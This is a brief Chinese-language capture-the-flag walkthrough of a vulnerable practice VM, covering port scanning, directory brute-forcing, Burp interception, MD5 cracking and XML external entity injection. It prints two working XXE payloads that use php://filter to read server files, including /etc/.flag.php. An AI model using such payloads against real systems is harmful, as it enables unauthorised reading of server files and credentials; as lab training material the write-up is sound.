1.安装靶机,将ova打开,运用kali查询开放端口及ip
2.靶机ip为192.168.126.147,用浏览器打开
3.运用kali dirb命令扫描ip下的信息
4.依据经验可得,访问robots.txt
5.分别访问两个目录
6.随机输入账号密码,运用bp进行抓包,发送到repeater进行下一步操作
7.发现 name 位置为回显位,构造xxe攻击
8.将图片内容进行base解码
依次尝试base32 base64
9.查看解码内容,看到username跟password的值
10.将密码进行解密
MD5解密
11.访问 http://192.168.168.147/xxe/admin.php
运用账号密码登录
12.点击flag,获得一个新的php文档
13.访问该文档
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flagmeout.php" > ]>
<root>
<name>
&xxe;
</name>
<password>
1
</password>
</root>
14.进行base-64解码
15.查看解码内容可以看到flag,进行解码
base64解码失败,进行base32解码
再次进行base64解码
16.查看到新的文件flag.php,进行查看
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/.flag.php" > ]>
<root>
<name>
&xxe;
</name>
<password>
696
</password>
</root>